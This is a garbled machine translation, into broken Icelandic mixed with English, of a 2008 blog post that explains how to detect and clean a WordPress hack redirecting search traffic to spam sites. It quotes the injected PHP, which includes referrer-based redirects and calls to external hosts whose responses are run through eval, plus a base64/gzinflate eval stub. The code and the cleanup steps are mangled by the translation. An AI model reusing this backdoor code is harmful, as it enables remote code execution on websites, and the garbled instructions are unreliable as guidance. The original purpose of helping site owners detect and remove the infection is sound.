WordPress Rei�hestur: Batna og Festa Google og Leita V�l e�a Neitun Kex Umfer� Breyta utan�skrift � til �inn-Needs.info, AnyResults.Net, Gullinn-Info.net og Annar �l�glegur Sta�ur

T�lvusn�pur ert a� fara allur �t til rei�hestur og hetjud�� WordPress blogs farfuglaheimili �t um allt the vefur, planta og innsp�ting illgjarn merkjam�l inn � WordPress merkjam�l og gagnasafn � r�� til breyta utan�skrift � gestur og hits fr� Google og annar leita v�l til spam sta�ur svo sem eins og �inn-needs.info, anyresults.net, gullinn-info.net, keymachine.de, beliy.us, seogoogle.us og margir annar spam sta�ur �essi fiskflak me� borga- �- smellur CPC ads. Sumir rei�hestur birtast til skotmark allst�r mannfj�ldi vi� breyta utan�skrift � allur �n WordPress kex. �n been t�lvusn�pur, �essir umfer� a� �v� er tali� er til koma a� the blog eins og �kv�r�unarsta�ur.

Einkenni af the Leita V�l Breyta utan�skrift � Rei�hestur

Minnispunktur �essi ekki allur einkenni mega gerast a� �llu leyti. There mega vera fleiri en einn a�fer� af j�rns�g tilvera, hver gefa til �l�kur uppg�tvun og m�gulegur einbeitni.

• Allir smellur � gegnum fr� leita v�l svo sem eins og Google, Yahoo, AOL, MSN, Gluggakista Lifandi leita aflei�ing, a� me�t�ldum blog nafn, vilja vera breyta utan�skrift � og flutningami�lari til t�lvusn�pur’ sta�ur svo sem eins og �inn-needs.info, anyresults.net, gullinn-info.net, keymachine.de, beliy.us, seogoogle.us, me� the listi viss til vaxa. �horfandi koma � the t�lvusn�pur bla�s��a me� the sami leita band �essi hann e�a h�n vanur eitthva� sem gert var oft leita � leita v�l.
• Smellur � a hlekkur til the blog � RSS f��a lesandi svo sem eins og Google lesandi geta vera breyta utan�skrift � til t�lvusn�pur sta�ur of.
• A gestur me� neitun reikningur � the blog, e�a ekki tenging ( �ess vegna hjartarskinn ekki hefur kex uppg�tva vi� illgjarn merkjam�l), vilja vera breyta utan�skrift � til spam sta�ur.
• Eini heims�kn fr� leita v�l ert been breyta utan�skrift � burt, og the brag� stj�rna til bj�ni � kring sennilega a einhver fj�ldi af bloggers, webmasters og sta�ur eignarr�ttur, e�a � minnstur tefja the uppg�tvun af the vandam�l.
• Skyndilegur gr��arst�r og til�rifamikill falla og missa af gegnheill magn af gestur umfer� og bla�s��a �ts�ni � vefur rekja spor einhvers t�lfr��i, s�rstaklega umfer� me� Google eins og tilv�sun, jafnvel �� leita v�l aflei�ing fremstur er �snortinn.
• Fjalllendi falla af augl�singar tekjur fr� Google AdSense e�a annar ads net, e�a tengja umbo�.
• The h�pur stu�ningsmanna undirsta�a umrita � dulm�l PHP merkjam�l mega birtast � the wp-blog-header.php skr�:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ eins og $ d�mari) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falskur){ $ser1=”?;brot; }
ef && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);�tgangur; }? >

• ��kve�inn greinir � ensku �mynd, hver er � sta�reynd a b�nt af illgjarn PHP merkjam�l, var added til the wp- innihald/ senda skr� fr� sinni t�lvu til annarrar skr�. Fyrir ford�mi, wp- innihald/ senda skr� fr� sinni t�lvu til annarrar/2008/06/06/abcdefghijklmn.jpg, e�a �a� mega vera inni �inn �ema mappa, i.e. wp-contents/themes/classic/images/xyz.jpg. The nafn af the �mynd mega vera � the sni� af xxxxxx_old.jpeg.
• ��kve�inn greinir � ensku innganga var b�ta inn � � MySQL gagnasafn fyrir WordPress wp_options til virkja the �mynd (the illgjarn PHP merkjam�l) eins og a tappi, � d�miger�an h�tt eins og rss_f541b3abd05e7962fcab37737f40fad8.
• There mega vera einnig illgjarn merkjam�l, s�rstaklega �essir �essi t�lkur me� meta() e�a base64_decode() stj�rn been b�ta inn � inn � annar WordPress PHP skr�. Ford�mi ert the h�pur stu�ningsmanna merkjam�l:

  ifisset_GET'p'(($[])) {
$sokkur = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ sokkur, ‘ f� http:/km20725.keymachine.de/ framrei�sluma�ur/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ sokkur, ‘ gestgjafi: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ sokkur));
$innihald = s�rb�na(”, $ innihald);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ sokkur);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ framrei�sluma�ur/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ framrei�sluma�ur/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress �ema �essi er been virkja og nota�ur geta vera sprauta me� rei�hestur merkjam�l og hr�r�ur of. Svo sem merkjam�l venjulega vera til � header.php e�a index.php af the �ema, og hefur a l�na l�kur til the ni�ri

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

The WordPress leita umfer� breyta utan�skrift � til spam sta�ur rei�hestur gerast sennilega s�kum �ryggi gat og varnarleysi �essi er ekki pjatla hven�r blog eigandi gera �t um ekki til uppf�rsla til n�jastur �tg�fa af WordPress ( enda ��tt sumirsk�rsla �essi �eirra blogs been t�lvusn�pur jafnvel �� �ess’ �egar � the n�jastur �tg�fa af WordPress 2.5.1). Hva� sem the ors�k, villutr�’ the festa og lausn til �setningur og �sigur the rei�hestur til tryggja �essi �� eiga bak the umfer� og for�ast been penalized vi� Google vi� �skynsamlegur breyta utan�skrift � til spam bla�s��a.

1. Varab�na�ur the WordPress gagnasafn.
2. Nota phpMyAdmin til beit WordPress MySQL gagnasafn matskei�. H�tta wp_options bor�, og �� ritst�ra the r��ur nafndagur active_plugins. The r��ur sm�atri�i allur virkur tappi �essi hefur been virkja. Fara � gegnum the listi ( � a l�na), og leita a� ��kve�inn greinir � ensku a tappi nafndagur ended me� ��kve�inn greinir � ensku �mynd eftirnafn, svo sem eins og .jpg, .jpeg, .gif og etc. Fyrir ford�mi, abcdefgh_old.jpeg. Minnispunktur d�nn the gangst�gur til the �mynd skr�.
3. Using sFTP e�a SSH ( gleyma ��ur � FTP e�a Telnet fyrir �ryggi), �� sigla til the gangst�gur af the skr�, og fella brott the skr�.
4. H�tta WordPress Stj�rnandi Tappi pallbor�, gera �virkan e�a virkja allir tappi til hreinsa upp the illgjarn tappi fr� the “active_plugins” r��ur.
5. Bak til phpMyAdmin, � the wp_options bor�, finna a r��ur �essi innihalda the h�pur stu�ningsmanna band eins og option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Fella brott the r��ur burt.

   Ef �� dont’ vita hvernig til framkv�ma the gagnasafn hreinsun n�kv�mur � st�ga yfir, villutr�’ a v�de� einkat�mi:

6. H�tta wp_users bor�. Ef there er a nafnlaus notandi ( n�ll gildi � user_nicename akur) skapa � 000000:: � 0000-00-00, minnispunktur d�nn the notandi PERS�NUSKILR�KI ( pers�nuskilr�ki akur, a tala). Fella brott the notandi.
7. Beit the wp_usermeta bor�. Sta�greina allur rows me� notandi jafningi the PERS�NUSKILR�KI af the fella brott �l�glegur notandi. There ert venjulega �r�r rows been f�lagi til the innr�sarma�ur notandi Pers�nuskilr�ki. Fella brott allur the f�lagi rows.
8. Tenging til the framrei�sluma�ur til ritst�ra the �ema skr�, e�a beit the �ema skr�’ merkjam�l � �ema Ritstj�ri af WordPress Stj�rnandi H�nnun pallbor�. St��va the header.php og index.php fyrir allir grunsamlegur merkjam�l. Eins og umtal yfir, leita a� eitthva� l�kur til the l�na ni�ri:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   Ef stofna, fella brott og fjarl�gja the merkjam�l. Minnispunktur �essi the illgjarn merkjam�l vilja vera nokkrir l�numa�ur langur � alger.

9. Ef �ess’ ekki �egar tilvera, skapa ��kve�inn greinir � ensku t�mur index.html skr� � the wp- innihald/ tappi skr�. The ey�a index.html fela the innihald af the tappi skr�, � �hrifar�kan h�tt skj�ldur hva�a tappi-ins been nota�ur fr� t�lvusn�pur til her�a og her�a the WordPress �ryggi.
10. Senda skr� fr� sinni t�lvu til annarrar og skipta um hvor og s�rhver WordPress skr� ( ekki eini wp-blog-header.php) � the framrei�sluma�ur me� the ferskur, hreinn, og frumeintakn�jastur �tg�fa fr� WordPress (au�vita�, a� fr�t�ldum f�ir skr� svo sem eins og wp-config.php og �ema). Ef �inn’ uppf�rsla, lesa the fylgja vandlega.
11. Breyting �inn lykilor�.
12. Ef �� hafa margfeldi notandi, breyting �eirra lykilor� ( e�a spyrja �� til breyting the lykilor�) of.

mikilv�gur: This er a v�l ���a bla�s��a hver er me� �v� skilyr�i " eins og er" �n �byrg�. T�lvu���ing mega vera erfi�ur til skilja. ��knast v�sa til tilfrumeintak Englendingar hlutur alltaf �egar m�gulegur.

Hluti og gefa e�a f� t�knilegur sty�ja og hj�lpa �Minn Stafr�nn L�f .

Skyldur Hlutur

• B�ta vi� NoFollow Samband til WordPress Blogroll til Auka S�mbo�i
• WordPress Tappi: S�na Google Greinandi og FeedBurner Sk�rsla T�lfr��i fr� Sta�ur Admin
• Technorati Komandi Hlekkur Tappi fyrir WordPress
• A Tillit � Google St�rkaupma�ur Leita
• Hvernig til For�ast, Hli�arbraut e�a Fl�ja Google Sandkassi
• SEO Vingjarnlegur Umskrifa A�fer� til Hreyfa Website URL Fr� Undirskr�asafn til R�t Foreldri Mappa
• Ask.com Leita V�l Rifja upp vi� CNNMoney
• �kufer� Fleiri Umfer� vi� Using �mynd
• Samlaga og S�na Google AdSense fyrir Leita og Co- Sp�jari Si�venja Leita V�l Aflei�ing � WordPress Blog Bla�s��a Sni�m�t
• Hver Leita V�l er the Bestur og Sem skiptir m�li?

This innganga var sta�a � �ri�judagur, J�n� 10th, 2008 � 103: er og er skr� undirWeblogs. �� geta fylgja allir svar til this innganga � gegnum the RSS 2.0 f��a �� getaleyfi a svar,e�a trackback fr� �inn eiga sta�ur.